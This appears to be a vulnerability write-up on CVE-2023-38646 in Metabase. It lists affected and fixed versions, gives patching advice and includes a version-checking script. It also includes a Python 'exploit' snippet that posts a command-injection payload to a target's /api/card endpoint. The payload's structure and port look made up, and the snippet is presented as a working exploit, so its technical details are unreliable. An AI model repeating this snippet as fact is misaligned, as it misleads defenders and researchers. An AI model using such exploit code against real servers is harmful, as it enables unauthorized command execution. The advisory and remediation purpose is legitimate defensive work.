A critical security vulnerability has been discovered in Metabase open source versions prior to .46.6.1 and Metabase Enterprise versions prior to 1.46.6.1, which allows unauthenticated attackers to execute arbitrary commands on the targeted server. This vulnerability, tracked as CVE-2023-38646, is highly critical as attackers can gain unauthorized access to servers running affected Metabase versions and perform malicious activities at the server's privilege level. Metabase has released patched versions of its software to address this vulnerability. Additionally, fixed versions for older Metabase releases include .45.4.1, 1.45.4.1, .44.7.1, 1.44.7.1, .43.7.2, and 1.43.7.2.

Exploit Details

The vulnerability exists in affected Metabase versions because of improper input validation and sanitization. An attacker can send specially crafted HTTP requests to the Metabase server; the server parses the request in a way that leads to the execution of arbitrary commands without requiring any authentication.

Here is a sample code snippet of the exploit:

import requests

target_url = "http://TARGET_IP_ADDRESS:300"
cmd_to_execute = "id"

payload = {
    "template-tags": {
        "cmd": {
            "name": "cmd",
            "display-name": "cmd",
            "default": "base",
            "type": "dimension"
        }
    },
    "type": "query",
    "native": {
        "query": "{{#dimension name=cmd}} EXPLOIT_PAYLOAD_HERE {{/dimension}}",
        "extra_format_tags":[
            {
                "name":"EXPLOIT_PAYLOAD_HERE",
                "query":"eval",
                "type":"number",
                "fn":"+" + cmd_to_execute
            }
        ]
    },
    "database":1
}

response = requests.post(target_url + "/api/card", json=payload)

print(response.text)

The above code sends a malicious HTTP request to the Metabase server running on TARGET_IP_ADDRESS:300. It injects the contents of the cmd_to_execute variable, here the arbitrary command "id", into the payload.

References

1. Metabase GitHub Repository: https://github.com/metabase/metabase
2. Metabase Security Advisory: https://github.com/metabase/metabase/security/advisories/GHSA-33cm-6g37-q64j
3. CVE-2023-38646 - NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-38646

Mitigation and Remediation

To protect your systems from exploitation, it is highly recommended to update your Metabase installation to the latest fixed versions immediately. If you are using Metabase open source, upgrade to version .46.6.1 or later. For Metabase Enterprise users, upgrade to version 1.46.6.1 or later.

If upgrading to the latest Metabase version is not possible, you can update to these patched versions for older Metabase releases: .45.4.1, 1.45.4.1, .44.7.1, 1.44.7.1, .43.7.2, and 1.43.7.2.
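The following added example (not part of this advisory and not Metabase's own tooling) checks a reported Metabase version string against the fixed releases listed above, so an inventory scan can flag installs that still need the upgrade. It assumes open-source releases are numbered 0.x (the page writes the leading zero as ".46.6.1") and Enterprise releases 1.x.

```python
import re
from typing import Tuple

# Fixed release per minor branch, keyed by (edition, minor); edition 0 = open source, 1 = Enterprise.
# Values are the fixed versions listed in this advisory (assuming the 0.x / 1.x numbering).
FIXED_VERSIONS = {
    (0, 46): (0, 46, 6, 1), (1, 46): (1, 46, 6, 1),
    (0, 45): (0, 45, 4, 1), (1, 45): (1, 45, 4, 1),
    (0, 44): (0, 44, 7, 1), (1, 44): (1, 44, 7, 1),
    (0, 43): (0, 43, 7, 2), (1, 43): (1, 43, 7, 2),
}
LATEST_FIXED_MINOR = 46  # .46.6.1 / 1.46.6.1 is the newest branch with a fix on this page


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn 'v0.46.6', '1.45.4.1' or '0.46.6-rc1' into a tuple of ints (pre-release suffix dropped)."""
    parts = []
    for piece in text.strip().lstrip("v").split("."):
        match = re.match(r"\d+", piece)
        if not match:
            break
        parts.append(int(match.group()))
        if match.end() != len(piece):  # e.g. '6-rc1': keep the 6, stop at the suffix
            break
    if len(parts) < 2 or parts[0] not in (0, 1):
        raise ValueError(f"not a Metabase version string: {text!r}")
    return tuple(parts)


def is_vulnerable(version_text: str) -> bool:
    """True when the version is below the fixed release of its branch, or on a branch with no fix."""
    version = parse_version(version_text)
    edition, minor = version[0], version[1]
    fixed = FIXED_VERSIONS.get((edition, minor))
    if fixed is None:
        # 47+ is not 'prior to 46.6.1'; branches older than 43 have no patched release listed.
        return minor < LATEST_FIXED_MINOR
    padded = (version + (0, 0, 0, 0))[:4]  # 0.46.6 compares as 0.46.6.0, i.e. before 0.46.6.1
    return padded < fixed


if __name__ == "__main__":
    for sample in ("v0.46.5", "0.46.6.1", "1.45.3", "1.45.4.1", "0.42.9", "0.47.0"):
        print(f"{sample:>10}: {'VULNERABLE' if is_vulnerable(sample) else 'fixed'}")
```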

As a general security best practice, limit the exposure of your Metabase server to the internet and restrict access to sensitive Metabase endpoints to authorized users only.

Conclusion

CVE-2023-38646 is a critical security vulnerability affecting Metabase open source and Metabase Enterprise editions. This vulnerability allows unauthenticated attackers to execute arbitrary commands on the targeted server, potentially leading to unauthorized activities and data breaches. Organizations using Metabase must update their installations to the fixed versions as soon as possible to avoid exploitation and safeguard their digital assets.

Timeline

Published on: 07/21/2023 15:15:10 UTC
Last modified on: 08/09/2023 18:15:13 UTC